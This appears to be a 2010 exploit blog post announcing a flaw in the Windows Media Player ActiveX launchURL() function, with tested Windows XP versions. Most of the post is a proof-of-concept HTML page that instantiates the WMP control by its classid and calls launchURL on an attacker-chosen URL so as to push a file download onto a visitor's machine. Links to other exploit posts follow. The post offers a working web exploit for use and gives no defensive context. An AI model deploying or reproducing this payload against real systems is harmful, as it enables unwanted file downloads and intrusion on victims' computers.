Vulnerable InforMation And IT News

This is a vulnerability into Windows Media Player ActiveX launchURL() function

which someone can download what ever file into the vulnerable machine !!!
Discovered and written by Jacky!
Tested version: 11.0.5358.4827
Tested machine: Windows XP SP3 & Windows XP SP2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

<html>  
 
<body>  
 
<object id='test' classid='clsid:{6BF52A52-394A-11d3-B153-00C04F79FAA6}'></object>  
 
<script>  
 
arg1='http://<BLAH BLAH BLAH FILE>';  
 
test.launchURL(arg1);  
 
</script>  
 
</body>  
 
</html>

Related Posts

• Internet Explorer Aurora Exploit
• IE wshom.ocx ActiveX Control Remote Code Execution
• Oracle SYS.LT.REMOVEWORKSPACE Evil Cursor Exploit
• FreeBSD Run-Time Link-Editor Local r00t Zeroday
• Windows Media Player Plugin: Local File Detection Vulnerability
• How to fix wordpress <=2.8.3 0day security bugs

Tags: 0DAY, launchURL, Windows Media Player

This entry was posted on Monday, January 18th, 2010 at 7:48 am and is filed under 0day, Vulnerable InforMation, exploit. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.